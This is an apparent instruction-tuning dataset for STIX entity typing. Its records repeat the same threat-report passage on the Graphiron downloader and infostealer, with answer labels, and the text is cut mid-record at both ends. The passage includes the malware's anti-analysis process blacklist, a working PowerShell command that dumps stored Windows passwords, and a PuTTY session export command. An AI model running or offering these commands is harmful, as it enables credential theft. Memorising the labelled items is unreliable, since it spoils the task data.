"input": "### Entity:\nida\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRAMMap64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nregmon\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGraphiron\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\njoeboxserver\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBurpSuite\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFirefox\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
